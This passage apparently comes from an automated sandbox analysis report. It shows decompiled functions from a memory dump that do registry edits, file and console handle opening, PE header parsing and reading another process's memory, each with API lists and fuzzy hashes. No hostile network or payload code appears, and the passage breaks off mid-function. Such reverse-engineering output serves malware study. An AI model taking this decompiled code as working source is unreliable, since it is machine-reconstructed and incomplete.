                                              0x002c6b64
                                              0x002c6b67
                                              0x002c6b6e
                                              0x002c6b75
                                              0x002c6b91
                                              0x002c6b93
                                              0x002c6b96
                                              0x002c6b96
                                              0x002c6b99
                                              0x002c6b9c
                                              0x002c6baa
                                              0x002c6cc4
                                              0x002c6cc9
                                              0x002c6ccc
                                              0x002c6ccd
                                              0x00000000
                                              0x002c6bcb
                                              0x002c6bcf
                                              0x002c6bd5
                                              0x00000000
                                              0x002c6bd5
                                              0x002c6b77
                                              0x002c6b77
                                              0x002c6b7e
                                              0x002c6b80
                                              0x002c6b80
                                              0x002c6b89
                                              0x002c6bd7
                                              0x002c6bd7
                                              0x002c6bda
                                              0x002c6bde
                                              0x002c6be1
                                              0x002c6c09
                                              0x002c6c3a
                                              0x002c6c3b
                                              0x002c6c45
                                              0x002c6c4a
                                              0x002c6c4b
                                              0x002c6c69
                                              0x002c6c76
                                              0x002c6c7b
                                              0x002c6c4d
                                              0x002c6c4d
                                              0x002c6c56
                                              0x002c6c5f
                                              0x002c6c64
                                              0x002c6c64
                                              0x002c6c83
                                              0x002c6c9c
                                              0x002c6cb3
                                              0x002c6cb8
                                              0x002c6cbb
                                              0x002c6c0b
                                              0x002c6c10
                                              0x002c6c16
                                              0x002c6c1e
                                              0x002c6c21
                                              0x002c6c29
                                              0x002c6c29
                                              0x002c6c2b
                                              0x002c6c2c
                                              0x002c6ccf
                                              0x002c6ccf
                                              0x002c6cd7
                                              0x002c6cd8
                                              0x002c6c09
                                              0x002c6ce0
                                              0x002c6ce1
                                              0x002c6cec

                                              APIs
                                              • towupper.MSVCRT ref: 002C6B89
                                              • iswalpha.MSVCRT ref: 002C6BBC
                                              • towupper.MSVCRT ref: 002C6BCF
                                              • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 002C6C01
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002C6C16
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002C6C23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                              • String ID: :\$%04X-%04X
                                              • API String ID: 4001382275-3541097225
                                              • Opcode ID: 020a6ce745a4d601eb751835031f1d5f5e91ee0400a787eac2365b6b7de63f4e
                                              • Instruction ID: de7b81c1ce55cdd19ccd07d5ca7edcf1163463f7f24a10749eefad668c99de61
                                              • Opcode Fuzzy Hash: 020a6ce745a4d601eb751835031f1d5f5e91ee0400a787eac2365b6b7de63f4e
                                              • Instruction Fuzzy Hash: EE412872664251ABD720AF659C4EFB773E8DF89B10F00051EF989D6180EE70DA54C7A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C587B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 41%
                                              			E002C587B(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _t23;
				char _t38;
				short* _t44;
				char* _t48;
				char* _t51;
				char* _t55;
				char* _t56;
				char* _t57;
				void* _t58;

				_t45 = __ecx;
				_push(0x18);
				_push(0x2cc0e0);
				E002B7678(__ebx, __edi, __esi);
				_t44 = __edx;
				 *(_t58 - 0x20) = __ecx;
				_t23 =  *(_t58 + 8);
				if(_t23 == 0 ||  *_t23 == 0) {
					__imp__RegDeleteKeyExW(_t45, _t44, 0, 0);
					_t55 = _t23;
					 *(_t58 - 0x1c) = _t55;
					if(_t55 == 0) {
						goto L16;
					}
					_t56 = RegOpenKeyExW( *(_t58 - 0x20), _t44, 0, 0x2000000, _t58 - 0x24);
					 *(_t58 - 0x1c) = _t56;
					if(_t56 == 0) {
						_t55 = RegDeleteValueW( *(_t58 - 0x24), 0x2a24ac);
						 *(_t58 - 0x1c) = _t55;
						if(_t55 != 0) {
							_push(0);
							E002AC5A2(_t45);
							_t45 = _t55;
						}
						RegCloseKey( *(_t58 - 0x24));
					} else {
						if(_t56 != 2) {
							_push(0);
							E002AC5A2(_t45);
							_t45 = _t56;
						}
					}
					goto L15;
				} else {
					_t55 = RegCreateKeyExW(__ecx, __edx, 0, 0, 0, 2, 0, _t58 - 0x20, 0);
					 *(_t58 - 0x1c) = _t55;
					if(_t55 != 0) {
						L7:
						_push(0);
						_push(_t55);
						E002AC5A2(_t45);
						E002AC5A2(_t45, 0x235d, 1, _t44);
						goto L15;
					} else {
						_t51 =  *(_t58 + 8);
						_t48 = _t51;
						_t57 =  &(_t48[2]);
						do {
							_t38 =  *_t48;
							_t48 =  &(_t48[2]);
						} while (_t38 != 0);
						_t45 = _t48 - _t57 >> 1;
						_t55 = RegSetValueExW( *(_t58 - 0x20), 0, 0, 1, _t51, 2 + (_t48 - _t57 >> 1) * 2);
						 *(_t58 - 0x1c) = _t55;
						RegCloseKey( *(_t58 - 0x20));
						if(_t55 != 0) {
							goto L7;
						}
						_push( *(_t58 + 8));
						_push(_t44);
						E002B25D9(L"%s=%s\r\n");
						L15:
						if(_t55 != 0) {
							L19:
							return E002B76BD(_t55);
						}
						L16:
						 *((intOrPtr*)(_t58 - 4)) = 0;
						if(E002B7797(_t45) != 0) {
							 *0x2ec020(0x8000000, 0, 0, 0);
						}
						 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
						goto L19;
					}
				}
			}












                                              0x002c587b
                                              0x002c587b
                                              0x002c587d
                                              0x002c5882
                                              0x002c5887
                                              0x002c5889
                                              0x002c588c
                                              0x002c5893
                                              0x002c5930
                                              0x002c5936
                                              0x002c5938
                                              0x002c593d
                                              0x00000000
                                              0x00000000
                                              0x002c5953
                                              0x002c5955
                                              0x002c595a
                                              0x002c597a
                                              0x002c597c
                                              0x002c5981
                                              0x002c5983
                                              0x002c5985
                                              0x002c598b
                                              0x002c598b
                                              0x002c598f
                                              0x002c595c
                                              0x002c595f
                                              0x002c5961
                                              0x002c5963
                                              0x002c5969
                                              0x002c5969
                                              0x002c595f
                                              0x00000000
                                              0x002c58a2
                                              0x002c58b5
                                              0x002c58b7
                                              0x002c58bc
                                              0x002c5913
                                              0x002c5913
                                              0x002c5914
                                              0x002c5915
                                              0x002c5922
                                              0x00000000
                                              0x002c58be
                                              0x002c58be
                                              0x002c58c1
                                              0x002c58c3
                                              0x002c58c6
                                              0x002c58c6
                                              0x002c58c9
                                              0x002c58cc
                                              0x002c58d3
                                              0x002c58eb
                                              0x002c58ed
                                              0x002c58f3
                                              0x002c58fb
                                              0x00000000
                                              0x00000000
                                              0x002c58fd
                                              0x002c5900
                                              0x002c5906
                                              0x002c5995
                                              0x002c5997
                                              0x002c59dc
                                              0x002c59e3
                                              0x002c59e3
                                              0x002c5999
                                              0x002c5999
                                              0x002c59a3
                                              0x002c59ad
                                              0x002c59ad
                                              0x002c59b3
                                              0x00000000
                                              0x002c59b3
                                              0x002c58bc

                                              APIs
                                              • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,002CC0E0,00000018,002C4B14,00000000,00000003), ref: 002C58AF
                                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,002CC0E0), ref: 002C58E5
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,002CC0E0,00000018,002C4B14,00000000,00000003), ref: 002C58F3
                                              • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,002CC0E0,00000018,002C4B14,00000000,00000003), ref: 002C5930
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,002CC0E0,00000018,002C4B14,00000000,00000003), ref: 002C594D
                                              • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,002A24AC,?,00000000,02000000,?,?,?,00000000,00000000,002CC0E0,00000018,002C4B14,00000000,00000003), ref: 002C5974
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,002CC0E0,00000018,002C4B14,00000000,00000003), ref: 002C598F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CloseDeleteValue$CreateOpen
                                              • String ID: %s=%s
                                              • API String ID: 1019019434-1087296587
                                              • Opcode ID: a60ea770c1830d3b7e62bf591a24ba2290f605120e440867d8f3d93fd25bc9a6
                                              • Instruction ID: 1e61b60cd4874c3a093a97ec5fd716f11267939e697bb01ec2c48cf4f57cf9a9
                                              • Opcode Fuzzy Hash: a60ea770c1830d3b7e62bf591a24ba2290f605120e440867d8f3d93fd25bc9a6
                                              • Instruction Fuzzy Hash: 7D31B171C60A65FBDB309F559C09FAF7B78EB8AB50B14424DFC097A250C6309D51CAE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C53E0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114libraryloaderCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 71%
                                              			E002C53E0(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v968;
				intOrPtr _v1004;
				intOrPtr _v1140;
				void _v1148;
				void _v1152;
				void _v1156;
				void _v1160;
				long _v1164;
				void* _v1184;
				char _v1188;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				void* _t42;
				struct HINSTANCE__* _t47;
				void* _t62;
				void* _t63;
				signed int _t64;

				_t60 = __edx;
				_t22 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t22 ^ _t64;
				_t62 = __ecx;
				_v1152 = 0;
				if( *0x2e8104 != 0) {
					L4:
					_t63 =  *0x2e8100;
					L5:
					if(_t63 != 0) {
						 *0x2e94b4(_t62, 0,  &_v1188, 0x18, 0);
						if( *_t63() >= 0) {
							_t63 = _v1184;
							if(ReadProcessMemory(_t62, _t63,  &_v1148, 0x470,  &_v1164) != 0) {
								if(_v1164 < 0xb4 || _v1004 - _t63 <= 0xb4) {
									if(ReadProcessMemory(_t62, _v1140 + 0x3c,  &_v1160, 4, 0) != 0 && ReadProcessMemory(_t62, _v1140 + _v1160 + 4,  &_v1156, 2, 0) != 0) {
										_t60 = _v1160 + _v1140 + 0x18;
										_t42 = E002C573B(_v1156, _v1160 + _v1140 + 0x18);
										if(_t42 != 0) {
											ReadProcessMemory(_t62, _t42,  &_v1152, 2, 0);
										}
									}
								} else {
									_v1152 = _v968;
								}
							}
						}
					}
					return E002B6FD0(_v1152, 0, _v8 ^ _t64, _t60, _t62, _t63);
				}
				_t47 = LoadLibraryExW(L"NTDLL.DLL", 0, 0);
				 *0x2e8104 = _t47;
				if(_t47 == 0) {
					 *0x2e8104 =  *0x2e8104 | 0xffffffff;
					goto L4;
				} else {
					_t63 = GetProcAddress(_t47, "NtQueryInformationProcess");
					 *0x2e8100 = _t63;
					goto L5;
				}
			}























                                              0x002c53e0
                                              0x002c53eb
                                              0x002c53f2
                                              0x002c53fc
                                              0x002c53fe
                                              0x002c540b
                                              0x002c5440
                                              0x002c5440
                                              0x002c5446
                                              0x002c5448
                                              0x002c545c
                                              0x002c5466
                                              0x002c546c
                                              0x002c548f
                                              0x002c54a0
                                              0x002c54db
                                              0x002c551a
                                              0x002c551c
                                              0x002c5523
                                              0x002c5531
                                              0x002c5531
                                              0x002c5523
                                              0x002c54ae
                                              0x002c54b5
                                              0x002c54b5
                                              0x002c54a0
                                              0x002c548f
                                              0x002c5466
                                              0x002c554e
                                              0x002c554e
                                              0x002c5414
                                              0x002c541a
                                              0x002c5421
                                              0x002c5439
                                              0x00000000
                                              0x002c5423
                                              0x002c542f
                                              0x002c5431
                                              0x00000000
                                              0x002c5431

                                              APIs
                                              • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 002C5414
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 002C5429
                                              • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000470,?), ref: 002C5487
                                              • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 002C54D3
                                              • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 002C54FA
                                              • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 002C5531
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                              • String ID: NTDLL.DLL$NtQueryInformationProcess
                                              • API String ID: 1580871199-2613899276
                                              • Opcode ID: 50573f733250867ba72e77cf6d9278025dc3e9a2bc7bb74985fea0081e994346
                                              • Instruction ID: a42f321bcee50ef0c3a07327e9c295831dbecf910020c717ae2161e19c75d3c9
                                              • Opcode Fuzzy Hash: 50573f733250867ba72e77cf6d9278025dc3e9a2bc7bb74985fea0081e994346
                                              • Instruction Fuzzy Hash: B44182B1A501299FDB208F24AC88FBE767CEB45744F40419DA64DEB240DB70EE91CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A5DB5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 48%
                                              			E002A5DB5(void* __ecx, signed int __edx) {
				long _v8;
				WCHAR* _v12;
				struct _SECURITY_ATTRIBUTES _v24;
				void* __ebx;
				signed int _t15;
				long _t17;
				void* _t19;
				long _t22;
				long _t23;
				WCHAR* _t32;
				signed int _t38;
				void* _t39;
				void* _t40;
				signed int _t42;

				_v24.lpSecurityDescriptor = _v24.lpSecurityDescriptor & 0x00000000;
				_t39 = __ecx;
				_v24.nLength = 0xc;
				_t23 = 3;
				_t41 = __edx;
				_t38 = __edx & _t23;
				_v24.bInheritHandle = 1;
				if(_t38 > 2) {
					L2:
					_t42 = _t41 | 0xffffffff;
					L3:
					return _t42;
				}
				_t15 = __edx & 0x00000009;
				if(_t15 != 9) {
					_push(L"con");
					_push(__ecx);
					if(_t38 != 0) {
						_t41 = (__edx | 1) << 0x1e;
						__imp___wcsicmp();
						if(_t15 != 0) {
							_t23 = 1;
						}
						_v8 = 2;
					} else {
						_t41 = 0x80000000;
						_v8 = 3;
						__imp___wcsicmp();
						if(_t15 == 0) {
							_t23 = 1;
						}
					}
					_t32 = E002B22C0(_t23, _t39);
					_t17 = _v8;
					_v12 = _t32;
					if(_t17 == 2) {
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, 3, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 != 0xffffffff) {
							goto L8;
						}
						_t17 = _v8;
						_t32 = _v12;
						goto L7;
					} else {
						L7:
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, _t17, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 == 0xffffffff) {
							_t22 = GetLastError();
							 *0x2e3cf0 = _t22;
							if(_t22 == 0x6e) {
								 *0x2e3cf0 = 2;
							}
							goto L2;
						}
						L8:
						__imp___open_osfhandle(_t40, 8);
						_t42 = _t19;
						if(_t42 == 0xffffffff) {
							CloseHandle(_t40);
						}
						goto L3;
					}
				}
				goto L2;
			}

















                                              0x002a5dbd
                                              0x002a5dc6
                                              0x002a5dc8
                                              0x002a5dcf
                                              0x002a5dd2
                                              0x002a5dd5
                                              0x002a5dd7
                                              0x002a5ddd
                                              0x002a5de8
                                              0x002a5de8
                                              0x002a5dec
                                              0x002a5df3
                                              0x002a5df3
                                              0x002a5de1
                                              0x002a5de6
                                              0x002a5df6
                                              0x002a5dfb
                                              0x002a5dfe
                                              0x002b9ce0
                                              0x002b9ce3
                                              0x002b9ced
                                              0x002b9cf1
                                              0x002b9cf1
                                              0x002b9cf2
                                              0x002a5e04
                                              0x002a5e04
                                              0x002a5e09
                                              0x002a5e10
                                              0x002a5e1a
                                              0x002a5e6d
                                              0x002a5e6d
                                              0x002a5e1a
                                              0x002a5e23
                                              0x002a5e25
                                              0x002a5e28
                                              0x002a5e2e
                                              0x002b9d0e
                                              0x002b9d14
                                              0x002b9d19
                                              0x00000000
                                              0x00000000
                                              0x002b9d1f
                                              0x002b9d22
                                              0x00000000
                                              0x002a5e34
                                              0x002a5e34
                                              0x002a5e43
                                              0x002a5e49
                                              0x002a5e4e
                                              0x002b9d36
                                              0x002b9d3c
                                              0x002b9d44
                                              0x002b9d4a
                                              0x002b9d4a
                                              0x00000000
                                              0x002b9d44
                                              0x002a5e54
                                              0x002a5e57
                                              0x002a5e5d
                                              0x002a5e64
                                              0x002b9d2b
                                              0x002b9d2b
                                              0x00000000
                                              0x002a5e64
                                              0x002a5e2e
                                              0x00000000

                                              APIs
                                              • _wcsicmp.MSVCRT ref: 002A5E10
                                              • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,08000080,00000003,08000080,00000000), ref: 002A5E43
                                              • _open_osfhandle.MSVCRT ref: 002A5E57
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 002B9D2B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                              • String ID: con
                                              • API String ID: 689241570-4257191772
                                              • Opcode ID: bc4bbf619cfb74feb7fbaccd011849a32c455d396ecc69aee7592d0eb5be7b47
                                              • Instruction ID: eed300a452fa3fbfd2f1425cdb63b66b5bf5a5d8d3a2883ab05efeef110e0a31
                                              • Opcode Fuzzy Hash: bc4bbf619cfb74feb7fbaccd011849a32c455d396ecc69aee7592d0eb5be7b47
                                              • Instruction Fuzzy Hash: D8317F31A60525AFE7249F689C8DB6F7BE8EB56331F20025AE921E72C0DF704D54C650
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C554F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99memoryfileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E002C554F(WCHAR* __ecx, void* __edx) {
				signed int _v8;
				long _v16;
				char _v76;
				signed short _v80;
				char _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				signed int _t15;
				signed short _t23;
				signed short* _t31;
				signed int _t32;
				void* _t42;
				void* _t43;
				signed int _t44;

				_t41 = __edx;
				_t12 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t12 ^ _t44;
				_t42 = 0;
				_t32 = 0;
				if(__ecx != 0) {
					_t43 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t43 == 0xffffffff) {
						L16:
						_t15 = _t32;
						goto L17;
					}
					_t41 =  &_v76;
					if(E002C5768(_t43,  &_v76, 0x40) != 0 && 0x5a4d == _v76 && SetFilePointer(_t43, _v16, 0, 0) != 0xffffffff) {
						_t41 =  &_v100;
						if(E002C5768(_t43,  &_v100, 4) != 0 && _v100 == 0x4550) {
							_t41 =  &_v96;
							if(E002C5768(_t43,  &_v96, 0x14) != 0) {
								_t23 = _v80;
								if(_t23 != 0) {
									_t42 = HeapAlloc(GetProcessHeap(), 8, _t23 & 0x0000ffff);
									if(_t42 != 0) {
										_t41 = _t42;
										if(E002C5768(_t43, _t42, _v80 & 0x0000ffff) != 0) {
											_t41 = _t42;
											_t31 = E002C573B(_v96, _t42);
											if(_t31 != 0) {
												_t32 =  *_t31 & 0x0000ffff;
											}
										}
										RtlFreeHeap(GetProcessHeap(), 0, _t42);
									}
								}
							}
						}
					}
					CloseHandle(_t43);
					goto L16;
				} else {
					_t15 = 0;
					L17:
					return E002B6FD0(_t15, _t32, _v8 ^ _t44, _t41, _t42, _t43);
				}
			}




















                                              0x002c554f
                                              0x002c5557
                                              0x002c555e
                                              0x002c5564
                                              0x002c5566
                                              0x002c556a
                                              0x002c558a
                                              0x002c558f
                                              0x002c564e
                                              0x002c564e
                                              0x00000000
                                              0x002c564e
                                              0x002c5597
                                              0x002c55a3
                                              0x002c55cb
                                              0x002c55d7
                                              0x002c55e4
                                              0x002c55f0
                                              0x002c55f2
                                              0x002c55f9
                                              0x002c560e
                                              0x002c5612
                                              0x002c5618
                                              0x002c5624
                                              0x002c5629
                                              0x002c562b
                                              0x002c5632
                                              0x002c5634
                                              0x002c5634
                                              0x002c5632
                                              0x002c5641
                                              0x002c5641
                                              0x002c5612
                                              0x002c55f9
                                              0x002c55f0
                                              0x002c55d7
                                              0x002c5648
                                              0x00000000
                                              0x002c556c
                                              0x002c556c
                                              0x002c5651
                                              0x002c5661
                                              0x002c5661

                                              APIs
                                              • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 002C5584
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 002C55BE
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 002C5601
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 002C5608
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 002C563A
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002C5641
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 002C5648
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                              • String ID: PE
                                              • API String ID: 3093239467-4258593460
                                              • Opcode ID: 3738d4f12e14e666cdc121acc6b6d8afd877dd9bb079e5f30c5f9e64ec6412a7
                                              • Instruction ID: 11ea849ec3000c55d8f2239daede3212de85092cd3da7a3e62f4a33616561de6
                                              • Opcode Fuzzy Hash: 3738d4f12e14e666cdc121acc6b6d8afd877dd9bb079e5f30c5f9e64ec6412a7
                                              • Instruction Fuzzy Hash: 0531F430610A66A7DB20AB659C4CFBEB6BD9B84B11F50021DF959DA1C4DF30D892CE24
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C84FE, Relevance: 13.6, APIs: 9, Instructions: 96fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E002C84FE(void* __eax, void* __edx, void* __eflags, DWORD* _a4, intOrPtr _a8, long _a12) {
				char _v8;
				void* __ecx;
				void* _t12;
				void* _t14;
				LONG* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				void** _t24;
				void** _t26;
				void* _t38;
				void* _t39;
				void* _t41;
				DWORD* _t42;
				LONG* _t44;
				void* _t45;

				_t24 = _t26;
				_t39 = __edx;
				__imp___get_osfhandle( *_t24, _t38, _t41, _t23, _t26);
				FlushFileBuffers(__eax);
				_t28 =  *_t24;
				E002ADB92( *_t24);
				_t30 = E002A5DB5(_t39, 0, _t28, _t28);
				 *_t24 = _t30;
				if(_t30 != 0xffffffff) {
					_t42 = _a4;
					_t12 =  ~_t42;
					__imp___get_osfhandle(2);
					SetFilePointer(_t12, _t30, _t12, 0);
					_t14 =  &_v8;
					__imp___get_osfhandle(0);
					_t15 = ReadFile(_t14,  *_t24, _a12, _t42, _t14);
					if(_t15 != 0) {
						if(_v8 != _t42) {
							goto L3;
						} else {
							_push(_t42);
							_push(_a12);
							_push(_a8);
							L002B82C7();
							_t30 =  *_t24;
							_t45 = _t45 + 0xc;
							_t44 = _t15;
							E002ADB92( *_t24);
							if(_t44 != 0) {
								goto L4;
							} else {
								_t21 = E002A5DB5(_t39, 1, _t39, _t39);
								 *_t24 = _t21;
								if(_t21 == 0xffffffff) {
									goto L1;
								} else {
									__imp___get_osfhandle(2);
									SetFilePointer(_t21, _t21, _t44, _t44);
									_t19 = 0;
								}
							}
						}
					} else {
						L3:
						_t30 =  *_t24;
						E002ADB92( *_t24);
						L4:
						 *_t24 =  *_t24 | 0xffffffff;
						goto L1;
					}
				} else {
					L1:
					E002AC5A2(_t30, 0x4000271f, 1, _t39);
					_t19 = 1;
				}
				return _t19;
			}



















                                              0x002c8505
                                              0x002c8509
                                              0x002c850d
                                              0x002c8515
                                              0x002c851b
                                              0x002c851d
                                              0x002c852d
                                              0x002c852f
                                              0x002c8534
                                              0x002c854e
                                              0x002c8557
                                              0x002c855b
                                              0x002c8563
                                              0x002c856b
                                              0x002c8575
                                              0x002c857d
                                              0x002c8585
                                              0x002c8596
                                              0x00000000
                                              0x002c8598
                                              0x002c8598
                                              0x002c8599
                                              0x002c859c
                                              0x002c859f
                                              0x002c85a4
                                              0x002c85a6
                                              0x002c85a9
                                              0x002c85ab
                                              0x002c85b2
                                              0x00000000
                                              0x002c85b4
                                              0x002c85bb
                                              0x002c85c0
                                              0x002c85c5
                                              0x00000000
                                              0x002c85cb
                                              0x002c85d0
                                              0x002c85d8
                                              0x002c85de
                                              0x002c85de
                                              0x002c85c5
                                              0x002c85b2
                                              0x002c8587
                                              0x002c8587
                                              0x002c8587
                                              0x002c8589
                                              0x002c858e
                                              0x002c858e
                                              0x00000000
                                              0x002c858e
                                              0x002c8536
                                              0x002c8536
                                              0x002c853e
                                              0x002c8548
                                              0x002c8548
                                              0x002c85e6

                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002C850D
                                              • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002C8CE3,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 002C8515
                                                • Part of subcall function 002ADB92: _close.MSVCRT ref: 002ADBC1
                                              • _get_osfhandle.MSVCRT ref: 002C855B
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 002C8563
                                              • _get_osfhandle.MSVCRT ref: 002C8575
                                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000000), ref: 002C857D
                                              • memcmp.MSVCRT ref: 002C859F
                                              • _get_osfhandle.MSVCRT ref: 002C85D0
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002C85D8
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: File_get_osfhandle$Pointer$BuffersFlushRead_closememcmp
                                              • String ID:
                                              • API String ID: 332413853-0
                                              • Opcode ID: 825933277ba17dcf052f5ec4db1cb25ab6d1da8b88c566b3f667dde6946e514d
                                              • Instruction ID: f788312eb9958699784fe3b12b6409135a4dfaff14152f2a656912c554abaa8e
                                              • Opcode Fuzzy Hash: 825933277ba17dcf052f5ec4db1cb25ab6d1da8b88c566b3f667dde6946e514d
                                              • Instruction Fuzzy Hash: 1E210431650150AFDF245F65EC8DFBB3BA9EF86370B448619F509CA1D0DEB04C20CA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A81E0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 253COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E002A81E0(intOrPtr _a4, long _a8, signed int* _a16) {
				signed int _v8;
				void* _v12;
				int _v20;
				char _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void _v548;
				void* _v552;
				long _v556;
				char _v560;
				int _v564;
				void* _v568;
				void* _v572;
				void* _v580;
				void _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				long _v1104;
				void* _v1108;
				void* _v1112;
				void* _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t93;
				long _t95;
				signed int _t97;
				signed int _t111;
				WCHAR* _t117;
				void* _t119;
				signed int _t120;
				WCHAR* _t122;
